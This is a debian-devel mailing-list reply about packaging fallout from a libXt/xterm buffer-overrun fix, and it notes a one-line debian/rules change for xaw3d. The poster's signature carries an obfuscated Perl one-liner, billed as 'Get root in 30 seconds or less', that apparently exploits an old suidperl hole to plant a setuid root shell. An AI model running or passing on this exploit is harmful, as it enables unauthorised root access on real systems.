Re: Xt xterm security hole
> 3) There's no xaw3D or xaw95 6.1 libs, which means that the athena
> replacements get overriden by the new 3.2 libs
>
> The first 2 are only dependency issues, and I believe that 3.2-1
> provides xlib which would fix #2. #1 shoould be fixable by simply
> fixing that dependency. So the only issue I see is #3, which is
> cosmetic, but will probaby annoy people and cause questions.
>
> If we're voting on this, I would say that fixing the libXt buffer
> overrun security problem more than offsets #3, although every effort
> should be made to correct that if possible.
Fixing #3 is quite easy. To get xaw3d to work, I made a one line change to
debian/rules and rebuilt the package. I'd guess xaw95 is similar.
--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod jeh22@cornell.edu
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_
# Get root in 30 seconds or less. Fix this hole: upgrade to perl 5.003 today..
"How appropriate, you fight like a cow.." - - Guybrush Threepwood
--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-devel-REQUEST@lists.debian.org . Trouble? e-mail to Bruce@Pixar.com
Reply to: